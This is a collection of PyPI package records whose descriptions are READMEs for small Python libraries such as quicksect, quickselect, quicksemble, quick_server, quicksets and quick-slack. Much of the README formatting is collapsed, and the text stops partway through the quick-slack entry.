Parserfromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getData('http://httpbin.org/ip',parserSubscriptionId='PARSER_SUBSCRIPTION_ID',dynamicInputs=[{'name':'YOUR_INPUT_NAME','value':'YOUR_INPUT_VALUE'}])print(response._content)Scroll To Bottom Of the Page Featurefromquickscraper_sdkimportQuickScraperquickscraper_client=QuickScraper('YOUR_ACCESS_TOKEN')response=quickscraper_client.getHtml('http://httpbin.org/ip',isScroll=True,scrollTimeout=1000)# 1000 Consider as milliseconds for scroll after 1000 millisecondsprint(response._content)Do you need an expert?Are you finding a developer for your world-class product? If yes, please contact here.\nOriginally byQuickScraper Developers - app@quickscraper.co."} +{"package": "quickscreen", "pacakge-description": "No description available on PyPI."} +{"package": "quicksearch", "pacakge-description": "Quick search command tool for your terminal"} +{"package": "quicksect", "pacakge-description": "DescriptionQuicksect is a fast python / cython implementation of interval search based on the pure python version inbx-pythonI pulled it out, optimized and converted to cython and James Taylor has incoporated it back into bx-python\nwith his improvements.I have brought this project back from the dead because I want a fast, simple, no-dependencies Interval\ntree.License is MIT.Installationpip install quicksectorconda install -c bioconda quicksectUse>>> from quicksect import IntervalNode, Interval, IntervalTreeMost common use will be via IntervalTree:>>> tree = IntervalTree()\n>>> tree.add(23, 45)\n>>> tree.add(55, 66)\n>>> tree.search(46, 47)\n[]\n>>> tree.search(44, 56)\n[Interval(55, 66), Interval(23, 45)]>>> tree.insert(Interval(88, 444))\n>>> res = tree.find(Interval(99, 100))\n>>> res\n[Interval(88, 444)]\n>>> res[0].start, res[0].end\n(88, 444)Thats pretty much everything you need to know about the tree.Test$ python setup.py testLow-LevelIn some cases, users may want to utilize the lower-level interface that accesses\nthe nodes of the tree:>>> inter = IntervalNode(Interval(22, 33))\n>>> inter = inter.insert(Interval(44, 55))\n>>> inter.intersect(24, 26)\n[Interval(22, 33)]>>> inter.left(Interval(34, 35), n=1)\n[Interval(22, 33)]>>> inter.right(Interval(34, 35), n=1)\n[Interval(44, 55)]"} +{"package": "quicksectx", "pacakge-description": "DescriptionQuicksect is a fast python / cython implementation of interval search based on the pure python version inbx-pythonI pulled it out, optimized and converted to cython and James Taylor has incoporated it back into bx-python\nwith his improvements.I have brought this project back from the dead because I want a fast, simple, no-dependencies Interval\ntree.(https://github.com/brentp/quicksect)Extended with removal operations and allows pretty print to display tree structure (By Jianlin)License is MIT.Installationpip install quicksectxUseTo use extended quicksect(quicksectx):>>> from quicksectx import IntervalNode, IntervalTree, Interval\n>>> tree = IntervalTree()\n>>> tree.add(1, 3, 100)\n>>> tree.add(3, 7, 110)\n>>> tree.add(2, 5, 120)\n>>> tree.add(4, 6, 130)\n>>> print(tree.pretty_print())\nInv(1, 3, d=100)\nr: Inv(3, 7, d=110)\nl: Inv(2, 5, d=120)\nr: Inv(4, 6, d=130)\n>>> print(tree.find(Interval(2, 5)))\n[Inv(1, 3, d=100), Inv(3, 7, d=110), Inv(2, 5, d=120), Inv(4, 6, d=130)]\n>>> tree.remove(Interval(2, 5))\n>>> print(tree.find(Interval(2, 5)))\n[Inv(1, 3, d=100), Inv(3, 7, d=110), Inv(4, 6, d=130)]To use traditional quicksect, you can still using the same syntax:>>> from quicksect import IntervalNode, Interval, IntervalTreeMost common use will be via IntervalTree:>>> tree = IntervalTree()\n>>> tree.add(23, 45)\n>>> tree.add(55, 66)\n>>> tree.search(46, 47)\n[]\n>>> tree.search(44, 56)\n[Interval(55, 66), Interval(23, 45)]>>> tree.insert(Interval(88, 444, 'a'))\n>>> res = tree.find(Interval(99, 100, 'b'))\n>>> res\n[Interval(88, 444)]\n>>> res[0].start, res[0].end, res[0].data\n(88, 444, 'a')Thats pretty much everything you need to know about the tree.Test$ python setup.py testLow-LevelIn some cases, users may want to utilize the lower-level interface that accesses\nthe nodes of the tree:>>> inter = IntervalNode(Interval(22, 33))\n>>> inter = inter.insert(Interval(44, 55))\n>>> inter.intersect(24, 26)\n[Interval(22, 33)]>>> inter.left(Interval(34, 35), n=1)\n[Interval(22, 33)]>>> inter.right(Interval(34, 35), n=1)\n[Interval(44, 55)]Since 0.3.7, you can use python\u2019s native pickle to pickle an IntervalTree object. For details, checktest_serialization.pyFor DevNow the version specification has been integrated with setup.py and pyproject.toml. To update versions, only need to change the __version__ inquicksectx/__init__.py"} +{"package": "quick-secure", "pacakge-description": "Quick SecureString encryptionInstallpipinstallquick-secureUsageimportquick_securemessage=\"sample message for encryption\"password=\"confidential\"# Encrypt messageencrypted_message=quick_secure.encrypt(message,password)print(encrypted_message)# Decrypt messagedecrypted_message=quick_secure.decrypt(encrypted_message,password)print(decrypted_message)"} +{"package": "quickselect", "pacakge-description": "quickselectIn what followspythonis an alias forpython3.5or any later\nversion (python3.6and so on),pypyis an alias forpypy3.5or any later\nversion (pypy3.6and so on).InstallationInstall the latestpip&setuptoolspackages versions:withCPythonpython-mpipinstall--upgradepipsetuptoolswithPyPypypy-mpipinstall--upgradepipsetuptoolsUserDownload and install the latest stable version fromPyPIrepository:withCPythonpython-mpipinstall--upgradequickselectwithPyPypypy-mpipinstall--upgradequickselectDeveloperDownload the latest version fromGitHubrepositorygitclonehttps://github.com/lycantropos/quickselect.gitcdquickselectInstall dependencies:withCPythonpython-mpipinstall--force-reinstall-rrequirements.txtwithPyPypypy-mpipinstall--force-reinstall-rrequirements.txtInstall:withCPythonpythonsetup.pyinstallwithPyPypypysetup.pyinstallUsage>>>fromquickselectimportfloyd_rivest,hoare>>>sequence=list(range(-100,101))>>>key=abs>>>(floyd_rivest.nth_largest(sequence,0,key=key)...==hoare.nth_largest(sequence,0,key=key)...==max(sequence,key=key))True>>>(floyd_rivest.nth_smallest(sequence,0,key=key)...==hoare.nth_smallest(sequence,0,key=key)...==min(sequence,key=key))TrueDevelopmentBumping versionPreparationInstallbump2version.Pre-releaseChoose which version number category to bump followingsemver\nspecification.Test bumping versionbump2version--dry-run--verbose$CATEGORYwhere$CATEGORYis the target version number category name, possible\nvalues arepatch/minor/major.Bump versionbump2version--verbose$CATEGORYThis will set version tomajor.minor.patch-alpha.ReleaseTest bumping versionbump2version--dry-run--verbosereleaseBump versionbump2version--verbosereleaseThis will set version tomajor.minor.patch.Running testsInstall dependencies:withCPythonpython-mpipinstall--force-reinstall-rrequirements-tests.txtwithPyPypypy-mpipinstall--force-reinstall-rrequirements-tests.txtPlainpytestInsideDockercontainer:withCPythondocker-compose--filedocker-compose.cpython.ymlupwithPyPydocker-compose--filedocker-compose.pypy.ymlupBashscript (e.g. can be used inGithooks):withCPython./run-tests.shor./run-tests.shcpythonwithPyPy./run-tests.shpypyPowerShellscript (e.g. can be used inGithooks):withCPython.\\run-tests.ps1or.\\run-tests.ps1cpythonwithPyPy.\\run-tests.ps1pypy"} +{"package": "quicksemble", "pacakge-description": "QuicksembleQuicksembleis a simple package to create a stacked ensemble for quick\nexperiments. It is developed inT2P Co., Ltd.DependenciesNumpypip install numpyScikit Learnpip install scikit-learnXgboostpip install xgboostInstallationpip install quicksembleBasic Usagefromsklearn.ensembleimportRandomForestClassifierfromxgboostimportXGBClassifierfromquicksemble.ensemblerimportEnsembler## Define train and test dataset here#models=[RandomForestClassifier(random_state=21),XGBClassifier(random_state=21)]# Default meta classifier is LogisticRegression. Hence it is weighted voting.ensemble=Ensembler(models)ensemble.fit(X_train,y_train)ensemble.predict(X_test)To change the default meta classifer:fromsklearn.ensembleimportRandomForestClassifierfromxgboostimportXGBClassifierfromquicksemble.ensemblerimportEnsembler## Define train and test dataset here#models=[RandomForestClassifier(random_state=21),XGBClassifier(random_state=21)]# Use Neural Network as meta classifierensemble=Ensembler(models,meta_model=MLPClassifier())ensemble.fit(X_train,y_train)ensemble.predict(X_test)By default, Base models use \"hard\" voting, i.e., it outputs predictions of the\nbase models. We can switch it to \"soft\" voting, i.e., it outputs probabilities\nof each class by the base model.To change voting style:fromsklearn.ensembleimportRandomForestClassifierfromxgboostimportXGBClassifierfromquicksemble.ensemblerimportEnsembler## Define train and test dataset here#models=[RandomForestClassifier(random_state=21),XGBClassifier(random_state=21)]# Use soft voting.ensemble=Ensembler(models,voting='soft')ensemble.fit(X_train,y_train)ensemble.predict(X_test)To view output of intermediary state i.e., output of base layers (layer 1)\nthat is going into meta layer (layer 2). Internally, it uses Pipelines from\nscikit-learn. So, feel free to read docs about pipelines.ensemble=Ensembler(models,voting='soft')ensemble.fit(X_train,y_train)# This line will output the values. Note that you need to fit it first.ensemble.ensemble.named_steps['base_layer'].transform(X_train)For already saved models, use modelpaths. Note that it should be pickled.es=Ensembler(modelpaths=['rf.pkl','xg.pkl'])es.fit(X_train,y_train)es.predict(X_train)"} +{"package": "quick-server", "pacakge-description": "quick_serveris a quick to use and easy to set up server\nimplementation. It has the following goals / features and is primarily\nmeant to speed up back end implementation / iteration:serve local files as is with basic black- and white-listingprovide functionality for dynamic requestsprovide easy access to worker threads (and caching)provide a basic command interpret loop for server commandsUsageYou can installquick_serverwith pip:pipinstallquick_serverImport it in python via:fromquick_serverimportcreate_server,msg,setup_restartNote that python 2 support is discontinued. Use version0.6.x:pipinstallquick_server<0.7Note that python 3.9 and lower support is discontinued. Use version0.7.x:pipinstallquick_server<0.8Setting up a basic file serverFollowing we will set up a basicquick_server. Please refer to theinline documentationof the methods for\nfull information.setup_restart()# sets up restart functionality (if not called the `restart` command of the server needs external help to work)# should be the first real executed command in the script# some services, like heroku, don't play well with this command and it should not be called if in such an environmentaddr=\"\"# empty address is equivalent to \"localhost\"port=8080server=create_server((addr,port),parallel=True)# parallel is recommended unless your code is not thread-safeserver.bind_path(\"/\",\"www\")# binds the \"www\" directory to the server's rootserver.add_default_white_list()# adds typical file types to the list of files that will be served; you can use server.add_file_patterns to add more file typesserver.favicon_fallback=\"favicon.ico\"# sets the default favicon file to the given file on disk (you'll need a file called \"favicon.ico\")# you can also use server.link_empty_favicon_fallback()server.suppress_noise=True# don't report successful requests (turn off if you want to measure performance)server.report_slow_requests=True# reports requests that take longer than 5sStarting the actual server:msg(f\"{' '.join(sys.argv)}\")# prints how the script was startedmsg(f\"starting server at{addrifaddrelse'localhost'}:{port}\")try:server.serve_forever()# starts the server -- only returns when the server stops (e.g., by typing `quit`, `restart`, or `CTRL-C`)finally:msg(\"shutting down..\")msg(f\"{' '.join(sys.argv)}\")# print how the script was called before exit -- this way you don't have to scroll up to remember when the server was running for a whileserver.server_close()# make sure to clean up all resourcesAdding dynamic requestsDynamic requests can be set up by annotating a function. The annotation\nconsists ofreturn-typeandhttp-method.APOSTrequest inJSONformat:fromquick_serverimportQuickServerRequestHandler,ReqArgs@server.json_post(\"/json_request\",0)# creates a request at http://localhost:8080/json_request -- 0 additional path segments are alloweddef_json_request(req:QuickServerRequestHandler,args:ReqArgs)->dict:return{\"post\":args[\"post\"],}AGETrequest asplain text:@server.text_get(\"/text_request\")# creates a request at http://localhost:8080/text_request -- additional path segments are alloweddef_text_request(req:QuickServerRequestHandler,args:ReqArgs)->str:return\"plain text\"Other forms of requests are also supported, namelyDELETEandPUT.argsis an object holding all request arguments.args[\"query\"]contains URL query arguments.args[\"fragment\"]contains the URL fragment part.args[\"paths\"]contains the remaining path segments.args[\"post\"]contains the posted content.args[\"files\"]contains uploaded files.args[\"meta\"]starts as empty dict but allows to add additional\ninfo to a request without conflicting with the other fields.Adding MiddlewareMiddleware can be added for common operations that apply for many endpoints\nsuch as, e.g., login token verification. The request and argument objects are\npassed through the middleware and can be modified by it.fromquick_serverimportPreventDefaultResponse,Response,ReqNextdefcheck_login(req:QuickServerRequestHandler,args:ReqArgs,okay:ReqNext)->ReqNext|dict:ifis_valid(args[\"post\"].get(\"token\")):args[\"meta\"][\"username\"]=...# we can manipulate the args objectreturnokay# proceed with the next middleware / main request# Response allows to return non-default status codes.# It can be used in normal request functions as well.returnResponse(\"Authentication Required\",401)# Alternatively we could just return a normal response with details herereturn{\"success\":False,\"msg\":...,}# If a non-control flow response is needed the PreventDefaultResponse# exception allows to return non-default status codes from anywhere.# This also works in normal request functions as well.raisePreventDefaultResponse(401,\"Authentication Required\")@server.json_post(\"/user_details\")@server.middleware(check_login)def_user_details(req:QuickServerRequestHandler,args:ReqArgs)->dict:return{\"success\":True,\"username\":args[\"meta\"][\"username\"],}Worker threads and cachingWorker threads are long running server side computations.\nThe client can start a request, gets an immediate response,\nand will check periodically if the computation has finished.\nFrom the client\u2019s perspective it looks like a normal request.Worker threads require support from the client side.First, provide the necessary JavaScript file viaserver.link_worker_js(\"/js/worker.js\")(useserver.link_legacy_worker_js(\"/js/worker.js\")if you arenotusing a transpiler)and load it on the client side:A worker request can be set up on the server side withfromquick_serverimportWorkerArgs@server.json_worker(\"/json_worker\")def_json_worker(post:WorkerArgs)->dict:# post contains all post arguments# ...# long, slow computationreturnmyresult# myresult must be JSON convertibleand accessed from the client. An instance of theWorkerclass is\nneeded:varwork=newquick_server.Worker();work.status((req)=>{...// req contains the number of currently active requests (-1 indicates an error state)// it can be used to tell the user that something is happening});Accessing the worker:// the first argument identifies worker jobs// jobs with the same name get replaced when a new one has been started// the second argument is the URLwork.post('worker_name','json_worker',{...// this object will appear as args on the server side},(data)=>{...// data is the result of the worker function of the server side// this function is only called if the request was successful});A worker can be cancelled using its name:work.cancel('worker_name');Note that all running workers are cancelled when the page is unloaded.Workers can automatically cache the server response usingquick_cache. The\nserver needs to be set up for this:cache=QuickCache(base_file,quota=500,ram_quota=100,warnings=msg)server.cache=cacheThen caching can be used for workers:@server.json_worker(\"/json_worker\",cache_id=lambdaargs:{...# uniquely identify the task from its arguments (must be JSON convertible)})def_json_worker(post:WorkerArgs)->dict:# ...# long, slow computationreturnmyresult# myresult must be JSON convertibleNote that caching can also be used for other types of requests.Using workers with babel or reactIf you\u2019re usingbabel(e.g., withreact) you can also\nmirror the file into your source folder:server.mirror_worker_js(\"src/worker.js\")and then import it:import'./worker.js';constWORKER=newwindow.quick_server.Worker();exportfunctionregisterStatus(cb){WORKER.status(cb);}exportfunctionfetchWorker(ref,url,post,cb){WORKER.post(ref,url,post,cb);}exportfunctioncancelWorker(ref){WORKER.cancel(ref);}Note that for a build you need to actually copyworker.jsinto you source folder since the build\nsystem gets confused with filesystem links.\nTo usequick_serverwith a build bind the build folder:server.bind_path(\"/\",\"build/\")During development it is recommended to forward\nrequests from thereactserver toquick_server.\nFor this add the following line to yourpackage.json:\"proxy\":\"http://localhost:8080\"where the proxy field redirects to thequick_server.TokensTokens are means to store client information on the server.\nFor that the server must send the token-id to the client:server.create_token()# creates a new token -- send this to the clientThe server can now access (read / write) data associated with this token:@server.json_post(\"/json_request\",0)def_json_request(req:QuickServerRequestHandler,args:ReqArgs)->...:# assuming the token-id was sent via post# expire can be the expiration time in seconds of a token,# None for no expiration, or be omitted for the default expiration (1h)withserver.get_token_obj(args[\"post\"][\"token\"],expire=None)asobj:...# do stuff with objCORS and proxyingCORS can be activated with:server.cross_origin=Trueand requests can be redirected via proxy (if you want to avoid CORS):server.bind_proxy(\"/foo/\",\"http://localhost:12345\")redirects every request that begins with/foo/and\nhas not been handled byquick_servertohttp://localhost:12345.Custom server commandsBy defaultquick_serverprovides the commandshelp(list of\navailable commands),restart(restart the server), andquit(terminates the server). You can add own commands via@server.cmd()defname(args:list[str])->None:# creates the command nameifnotargs:msg(\"hello\")else:msg(f\"hi{' '.join(args)}\")# words typed after name are printed hereA common command to add when having caching functionality (e.g.,\nprovided byquick_cache) is to\nclear caches. This show-cases also auto-complete functionality:defcomplete_cache_clear(args:list[str],text:str)->list[str]:# args contains already completed arguments; text the currently started oneifargs:# we only allow up to one argumentreturn[]return[sectionforsectionincache.list_sections()ifsection.startswith(text)]# cache is the quick_cache object@server.cmd(complete=complete_cache_clear)defcache_clear(args:list[str])->None:iflen(args)>1:# we only allow up to one argumentmsg(f\"too many extra arguments! expected one got{' '.join(args)}\")returnmsg(f\"clear{''ifargselse'all '}cache{' 'ifargselse's'}{args[0]ifargselse''}\")cache.clean_cache(args[0]ifargselseNone)Server without command loopThe easiest way to start the server without a command loop (e.g., when\nstarted as service) is to stop the loop with an EOF by calling the\nscript like this:cat/dev/null|pythonyourscript.pyor use theno_command_loopflag and run the script normally:server.no_command_loop=TrueHTTPSYou can wrap the server socket to support HTTPS:importssladdr=\"\"# empty address is equivalent to \"localhost\"port=443# the HTTPS default port 443 might require root privilegesserver=create_server((addr,port),parallel=True)server.socket=ssl.wrap_socket(server.socket,certfile=\"path/to/localhost.pem\",server_side=True)# setup your servertry:server.serve_forever()finally:server.server_close()More examplesexample.pyandexample2.pyalso contain minimal example\nservers. You can run them with./example.pyand./example2.pyrespectively from the examples directory. Then you can browse tohttp://localhost:8000/example/.ContributingPull requests are highly appreciated :) Also, feel free to openissuesfor any\nquestions or bugs you may encounter."} +{"package": "quicksets", "pacakge-description": "Quicksets is a lightweight settings library based on Python classes.No dependency!It provides inheriting settings classes.\nRewrite just attributes that you really need to change:>>> # File: `myapp.settings.develop.py`\n>>> class DevelopConfig:\n... POSTGRESQL_HOST = 'localhost'\n... POSTGRESQL_PORT = 5432\n... POSTGRESQL_USERNAME = 'postgres'\n... POSTGRESQL_PASSWORD = None\n... POSTGRESQL_DATABASE = 'db'\n... POSTGRESQL_POOL_MIN_SIZE = 4\n... POSTGRESQL_POOL_MAX_SIZE = 32\n... POSTGRESQL_POOL_RECYCLE = True\n...\n... @property\n... def POSTGRESQL_CONNECTION_OPTIONS(self):\n... return {\n... 'user': self.POSTGRESQL_USERNAME,\n... 'password': self.POSTGRESQL_PASSWORD,\n... 'host': self.POSTGRESQL_HOST,\n... 'port': self.POSTGRESQL_PORT,\n... 'database': self.POSTGRESQL_DATABASE,\n... 'minsize': self.POSTGRESQL_POOL_MIN_SIZE,\n... 'maxsize': self.POSTGRESQL_POOL_MAX_SIZE,\n... 'pool_recycle': self.POSTGRESQL_POOL_RECYCLE\n... }\n...>>> # File: `myapp.settings.testing.py`\n>>> from myapp.settings.develop import DevelopConfig\n>>>\n>>> class TestingConfig(DevelopConfig):\n... POSTGRESQL_DATABASE = 'db_test'\n...>>> # File: `myapp.settings.product.py`\n>>> from myapp.settings.develop import DevelopConfig\n>>>\n>>> class ProductConfig(DevelopConfig):\n... POSTGRESQL_HOST = '10.0.0.1'\n... POSTGRESQL_DATABASE = 'db_prod'\n... POSTGRESQL_USERNAME = 'prod_user'\n... POSTGRESQL_PASSWORD = '?????????'\n...>>> # File: `myapp.application.py`\n>>> # run bash command `export SETTINGS=\"myapp.settings.product\"`\n>>> from quicksets import settings\n>>>\n>>> settings.POSTGRESQL_CONNECTION_OPTIONS\n{'minsize': 4, 'maxsize': 32, 'host': '10.0.0.1', 'user': 'prod_user', 'database': 'db_prod', 'pool_recycle': True, 'password': '?????????', 'port': 5432}copyright:Copyright 2019-2020 by the Ihor Nahuliak, see AUTHORS.license:GNU General Public License v3 (GPLv3), see LICENSE for details.Home-page:https://github.com/ihor-nahuliak/quicksetsAuthor: Ihor Nahuliak\nAuthor-email:ihor.nahuliak@gmail.comLicense: GPL v.3.0\nDescription: UNKNOWN\nPlatform: any\nClassifier: License :: OSI Approved :: GNU General Public License v3 (GPLv3)\nClassifier: Programming Language :: Python\nClassifier: Programming Language :: Python :: 2\nClassifier: Programming Language :: Python :: 2.7\nClassifier: Programming Language :: Python :: 3\nClassifier: Programming Language :: Python :: 3.5\nClassifier: Programming Language :: Python :: 3.6\nClassifier: Programming Language :: Python :: 3.7\nClassifier: Programming Language :: Python :: Implementation :: CPython\nClassifier: Programming Language :: Python :: Implementation :: PyPy\nClassifier: Development Status :: 1 - Planning\nRequires-Python: >=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*\nProvides-Extra: dev"} +{"package": "quickshare", "pacakge-description": "No description available on PyPI."} +{"package": "quickshear", "pacakge-description": "Quickshear uses a skull stripped version of an anatomical images as a reference\nto deface the unaltered anatomical image.Usage:quickshear.py [-h] anat_file mask_file defaced_file [buffer]\n\nQuickshear defacing for neuroimages\n\npositional arguments:\n anat_file filename of neuroimage to deface\n mask_file filename of brain mask\n defaced_file filename of defaced output image\n buffer buffer size (in voxels) between shearing plane and the brain\n (default: 10.0)\n\noptional arguments:\n -h, --help show this help message and exitFor a full description, see the following paper:[Schimke2011]Schimke, Nakeisha, and John Hale. \u201cQuickshear defacing for neuroimages.\u201d\nProceedings of the 2nd USENIX conference on Health security and privacy.\nUSENIX Association, 2011."} +{"package": "quickshow", "pacakge-description": "Quick-ShowQuick-Show helps you draw plots quickly and easily.It is an abstraction using popular libraries such as Scikit-Learn and MatPlotLib, thus it is very light and convenient.Note: Quick-Show is sub-modules of other packages to manage quickshow more lightly and use more widly.This is a project under development. With the end of the project, I plan to provide documents in major version 1 and sphinx. It isNOTrecommended to use prior to major version 1.Installation$ pip install quickshowTutorialMain-tutorials:https://github.com/DSDanielPark/quick-show/blob/main/tutorial/tutorial.ipynbSub-tutorial-folder: Tutorials for each function can be found inthis folder. The tutorial is synchronized with the Python file name provided by QuickShow.Features1 Related to dimensionality reduction2D or 3D t-SNE and PCA plots using specific columns of a refined dataframe.\nCreate a scatter plot very quickly and easily by inputting a clean dataframe and column names that do not have missing data.vis_tsne2d: Simple visuallization of 2-dimensional t-distributed stochastic neighbor embeddingvis_tsne3d: Simple visuallization of 3-dimensional t-distributed stochastic neighbor embeddingvis_pca: Simple visuallization of Principal Component Analysis (PCA)2 Related to classification model evaluation.Later these functions are encapsulated into classes.vis_cm: Visuallization heatmap of confusion_matrix and return classification report dataframe.get_total_cr_df: When the confusion matrix dataframe created by the vis_cm function is saved as csv, the directory of the folder where these csv files exist is received as input and the confusion matrices of all csv files are merged into a single data frame.vis_multi_plot: It takes the return dataframe of get_total_cr_df as input and draws a nice plot. However, if you want to use this function, please note that the suffix of the multiple csv files input to get_total_cr_df must be exp and an integer, such asexp3, and the integers must becontiguous.3 Related to clustering.vis_cluster_plot: Produces a plot to see how spread out the actual label values \u200b\u200bare within the clusters.4 Utilsfind_all_files: If you enter the top folder path as an auxiliary function, it returns a list of files including keywords while recursively searching subfolders. This is implemented with the glob package.rcparam: It simply shows some rcparams method in matploblib. Check by callingqs.rcparam?ExamplesFeature 1See example dataframe...importpandasaspddf=pd.DataFrame([3,2,3,2,3,3,1,1])df['val']=[np.array([np.random.randint(0,10000),np.random.randint(0,10000),np.random.randint(0,10000)])forxindf[0]]df.columns=['labels','values']print(df)labelsvalues03[8231 3320 6894]12[3485 7 7374].........61[5218 9846 2488]71[6661 5105 136]fromquickshowimportvis_tsne2d,vis_tsne3d,vis_pcareturn_df=vis_tsne2d(df,'values','labels',True,'./save/fig1.png')return_df=vis_tsne3d(df,'values','labels',True,'./save/fig2.png')return_df=vis_pca(df,'values','labels',2,True,'./save/fig3.png')return_df=vis_pca(df,'values','labels',3,True,'./save/fig4.png')All function returns the dataframe which used to plot. Thus, use the returned dataframe object to customize your plot. Or usematplotlib's rcparammethods.If the label column does not exist, simply enterNoneas an argument.For more details, please check doc string.Feature 2See example dataframe...importpandasaspdlabel_list,num_rows=['cat','dog','horse','dorphin'],300df=pd.DataFrame([label_list[np.random.randint(4)]for_inrange(num_rows)],columns=['real'])df['predicted']=[label_list[np.random.randint(4)]for_inrange(num_rows)]print(df)realpredicted0catcat1horsecat.........7horsedog299dorphinhorsefromquickshowimportvis_cmdf_cr,cm=vis_cm(df,'real','predicted','vis_cm.csv','vis_cm.png')print(df_cr)catdogdorphinhorseaccuracymacro avgweighted avgprecision0.3048780.3448280.2857140.2763160.30.3029340.304337recall0.3289470.2469140.3287670.30.30.3011570.3f1-score0.3164560.287770.3057320.2876710.30.2994070.299385support768173700.3300300confusion matirx will be shown as below.This function return pandas.DataFrame obejct of classification report and confusion metix as shown below.Use Case[1]Korean-news-topic-classification-using-KO-BERT: all plots were created through Quick-Show.References[1] Scikit-Learnhttps://scikit-learn.org[2] Matplotlibhttps://matplotlib.org/ContactsMaintainers:Daniel Park, South Koreae-mailparkminwoo1991@gmail.comCould you kindly add this badge to your repository? Thank you!![Quick-Show](https://img.shields.io/badge/pypi-quickshow-blue)"} +{"package": "quicksift", "pacakge-description": "fast-edaBlazing Fast Exploratory Data Analysis"} +{"package": "quicksilver", "pacakge-description": "QuicksilverSimple test package."} +{"package": "quick-sketches", "pacakge-description": "Quick SketchesWhile implementing a paper, we had to create a new library for Count-Min Sketches and Count-Sketches, as current solutions were inadequate. C++ libraries are difficult to use, and Python packages tend to be slow. Thus, we wrote a Python package that contains Python bindings to a C++ library to calculate the predictions of the count-min sketch and count sketches. In short, you can take advantage of C++ code to get predictions for the count-min sketch and count sketch while writing just Python!Quick SketchesInstallationUsageInstallationTo install the package, one simply only needs to runpip install quick_sketchesUsageConsider the following example to get the count-min sketch when there is three of an element, four of another element, and finally five of a last element. There are five levels in the sketch, and each level contains 100 counters.import quick_sketches as m\nimport numpy as np\n\na = np.array([3, 4, 5])\nm.cm_sketch_preds(5, a, 100, 1) # usually [3, 4, 5], but sometimes not![numpy array of long longs] cm_sketch_preds(int nhashes, [numpy array of long longs] np_input, ll width, int seed)takes as inputnhashes:The number of hash functions used in the sketchnp_input:The numpy array containing the frequencies of each key (note that order doesn't matter)width:The width of the sketch, or the number of entries in each row of the sketchseed:A random seed.Then, it outputs what a count-min sketch would give as predicted frequencies with that particular set of parameters, where the output prediction at index i corresponds to the key in np_input at index i. For example, if np_input was [3, 4, 5], the output might also be [3, 4, 5], but it could not be [4, 3, 5], by the conservative nature of the sketch.[numpy array of doubles] count_sketch_preds(int nhashes, [numpy array of long longs] np_input, ll width, int seed)performs the same function for the Count-Sketch, with parameters:nhashes:The number of hash functions used in the sketchnp_input:The numpy array containing the frequencies of each key (note that order doesn't matter)width:The width of the sketch, or the number of entries in each row of the sketchseed:A random seed.Note one key difference, however: the output is indoubles, because the count-sketch takes medians, which sometimes leads to half-integer outputs!"} +{"package": "quick-slack", "pacakge-description": "Quick slackCLI tool to send message to mornitor status, notify process end, etc by slack.\ud55c\uad6d\uc5b4 README\ub294\uc5ec\uae30\ub97c \ud074\ub9ad\ud574\uc8fc\uc138\uc694.InstallIt is recommended to install using pipx because command might not work depending on virtualenv state.Install pipx$python3-mpipinstallpipxseeherefor more information about installing pipxInstall Quick Slack for global$pipxinstallquick-slackAfter complete the installation of pipx, install Quick-slack through pipxInstall Quick Slack for some environmentIf you want to install it only in a specific environment, you can install it as a normal pip.$pipinstallquick-slackUsageAdd Bot to workspaceFirst, go tohttps://api.slack.com/appsand create an app in Workspace.Then add the following permissions to the Bot Token Scope:chat:writechannels:readgroups:readim:readmpim:readusers:readusergroups:readIf you install the app in Workspace from the Install App, you will receive a Bot User OAuth Access Token starting with xoxb.Set Config$qslackconfig\nUsage:qslackconfig[OPTIONS]COMMAND[ARGS]...Showorupdateconfigs\n\nOptions:--helpShowthismessageandexit.\n\nCommands:setSetconfigurationsDefaultchannelisalwaysonlyone,soyou...showShowcurrentconfigs$ qslack config show\nslack_oauth_token : None\ndefault_channel_id : None\ndefault_mentions : None'qslack config show' command allows you to view the current config.$ qslack config set --help\nUsage: qslack config set [OPTIONS]\n\n Set configurations\n\n Default channel is always only one, so you cannot and don't need to pass default channel name and default channel id.\n Default mention format is like '@user1 @here !subteam3'. Warn you should use ! with custom usergroup like 'engineer'.\n\nOptions:\n --api-token TEXT Slack oauth API token start with xoxb-...\n --default-mentions TEXT Default mention user or groups\n --default-channel-name TEXT Default channel name to send message, enter\n '@username' if channel is direct message\n\n --default-channel-id TEXT Default channel id to send message\n --help Show this message and exit.$ qslack config set --api-token xoxb-1231-12312312 --default-mentions '@psj8252 @here' --default-channel-id C10100110\nSetting slack token is done.\nSetting default mentions is done.\nSetting default channel is done.You can set config as shown abovedefault-mentions are the target of mention when turning onmentionoption in using the command to send a message.default channel means the channel to which a message is sent when using the command to send a message.default channel is set by directly entering id as default-channel-id argument or channel name as default-channel-name argument.Send Message$ qslack send --help\nUsage: qslack send [OPTIONS] MESSAGE\n\n Send message to the channel\n\nOptions:\n -m, --mention If use this flag, mention default mention\n user/groups\n\n -c, --channel-name TEXT Channel name to send message, use default channel\n in config if not passed\n\n --help Show this message and exit.You can send message by usingqslack sendcommand.$ qslack send hi\nError occured in sending message!\n{'ok': False, 'error': 'invalid_auth', 'warning': 'missing_charset', 'response_metadata': {'warnings': ['missing_charset']}}If the token is incorrect, the above error may occur.qslack send hi\nError occured in sending message!\n{'ok': False, 'error': 'not_in_channel', 'warning': 'missing_charset', 'response_metadata': {'warnings': ['missing_charset']}}Bot must be added to the channel to send a message. If not, may result in errors such as 'not_in_channel' or 'channel_not_found'.If an error occurs, it is related to the slack API, so if you enter the token incorrectly or miss the permission setting, you should set the token properly and add the missing permission.Send a message based on command resultsqslack cond --help\nUsage: qslack cond [OPTIONS] COMMAND\n\n Run command and send message based on whether success command\n\nOptions:\n -s, --success TEXT Message sent if command success\n -f, --fail TEXT Message sent if command failed\n -m, --mention If use this flag, mention default mention users\n --help Show this message and exit.The command above is to send a message based on the results of the command. If exit code is 0, send the message of success argument and if not, send the message of failure argument.If you have not set up a message, do not send a message.$ qslack cond pwd -s hi -f hello\n/Users/psj8252/quick-slack\nCommand success\nSending message is done.For example, if the pwd command is successful, sends a message 'hi'.qslack cond 'bash -c \"exit 1\"' -f good\nCommand exit with 1\nSending message is done.In the above case, send the message 'good' because the exit code failed to 1.Periodically execute command and send results as a 